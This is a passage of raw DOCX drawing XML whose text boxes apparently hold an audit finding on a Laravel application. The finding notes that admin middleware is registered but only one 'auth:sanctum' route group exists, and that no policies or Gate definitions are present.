                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>// app/Http/Kernel.php:67</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="560" name="Rectangle 560"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1193254"/>
                            <a:ext cx="3984008" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7CA57000" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">'admin' =&gt; </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>\App\Http\Middleware\</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>AdminMiddleware</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class,</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="561" name="Rectangle 561"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1551896"/>
                            <a:ext cx="675702" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6D8AF642" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">A grep of </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="562" name="Shape 562"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="504825" y="1543050"/>
                            <a:ext cx="466725" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="466725" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="459830" y="0"/>
                                  <a:pt x="462075" y="930"/>
                                  <a:pt x="463935" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="465795" y="4648"/>
                                  <a:pt x="466725" y="6896"/>
                                  <a:pt x="466725" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="466725" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="466725" y="126454"/>
                                  <a:pt x="465795" y="128699"/>
                                  <a:pt x="463935" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="462075" y="132417"/>
                                  <a:pt x="459830" y="133347"/>
                                  <a:pt x="457200" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>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63" name="Rectangle 563"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="535037" y="1566711"/>
                            <a:ext cx="542648" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7C3AAD5A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>routes/</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="564" name="Rectangle 564"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="970062" y="1551896"/>
                            <a:ext cx="482711" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4EA86568" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> found </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="565" name="Rectangle 565"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1333053" y="1551896"/>
                            <a:ext cx="280624" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1B9BD25E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t>one</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="566" name="Rectangle 566"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1544092" y="1551896"/>
                            <a:ext cx="2333704" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="574AC26E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> middleware </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:t>call</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:t xml:space="preserve"> in the entire file: </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="567" name="Shape 567"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3295650" y="1543050"/>
                            <a:ext cx="1981200" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1981200" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1971675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1974305" y="0"/>
                                  <a:pt x="1976550" y="930"/>
                                  <a:pt x="1978410" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1980270" y="4648"/>
                                  <a:pt x="1981200" y="6896"/>
                                  <a:pt x="1981200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1981200" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1981200" y="126454"/>
                                  <a:pt x="1980270" y="128699"/>
                                  <a:pt x="1978410" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1976550" y="132417"/>
                                  <a:pt x="1974305" y="133347"/>
                                  <a:pt x="1971675" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>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68" name="Rectangle 568"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3325713" y="1566711"/>
                            <a:ext cx="2558197" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4749C98F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>Route::</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>middleware('</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>auth:sanctum</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>')</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="569" name="Rectangle 569"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5276255" y="1551896"/>
                            <a:ext cx="728346" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="78375F23" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> at line 31.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="570" name="Shape 570"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1714500"/>
                            <a:ext cx="1333500" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1333500" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1323975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1326605" y="0"/>
                                  <a:pt x="1328850" y="930"/>
                                  <a:pt x="1330710" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1332570" y="4648"/>
                                  <a:pt x="1333500" y="6896"/>
                                  <a:pt x="1333500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1333500" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1333500" y="126454"/>
                                  <a:pt x="1332570" y="128699"/>
                                  <a:pt x="1330710" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1328850" y="132417"/>
                                  <a:pt x="1326605" y="133347"/>
                                  <a:pt x="1323975" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2787"/>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71" name="Rectangle 571"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="26938" y="1738161"/>
                            <a:ext cx="1705465" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4870CAD9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>AuthServiceProvider:15</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="572" name="Rectangle 572"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1336328" y="1732871"/>
                            <a:ext cx="1044190" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="106EED5E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> had an empty </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="573" name="Shape 573"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2124075" y="1714500"/>
                            <a:ext cx="571500" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="571500" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="561975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="564605" y="0"/>
                                  <a:pt x="566850" y="930"/>
                                  <a:pt x="568710" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="570570" y="4648"/>
                                  <a:pt x="571500" y="6896"/>
                                  <a:pt x="571500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="571500" y="126454"/>
                                  <a:pt x="570570" y="128699"/>
                                  <a:pt x="568710" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="566850" y="132417"/>
                                  <a:pt x="564605" y="133347"/>
                                  <a:pt x="561975" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130559"/>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74" name="Rectangle 574"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2148483" y="1738161"/>
                            <a:ext cx="697690" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1041FDB6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>$policies</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="575" name="Rectangle 575"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2700040" y="1732871"/>
                            <a:ext cx="1734305" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="246BC796" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> array, and there was no </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="576" name="Shape 576"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4000499" y="1714500"/>
                            <a:ext cx="752475" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745581" y="0"/>
                                  <a:pt x="747826" y="930"/>
                                  <a:pt x="749686" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751546" y="4648"/>
                                  <a:pt x="752475" y="6896"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="126454"/>
                                  <a:pt x="751546" y="128699"/>
                                  <a:pt x="749686" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747826" y="132417"/>
                                  <a:pt x="745581" y="133347"/>
                                  <a:pt x="742950" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130559"/>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577" name="Rectangle 577"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4031010" y="1738161"/>
                            <a:ext cx="930254" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="54344820" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>Gate::</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>define</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="578" name="Rectangle 578"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4757440" y="1732871"/>
                            <a:ext cx="1719742" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7F118AB0" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> anywhere in the project.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
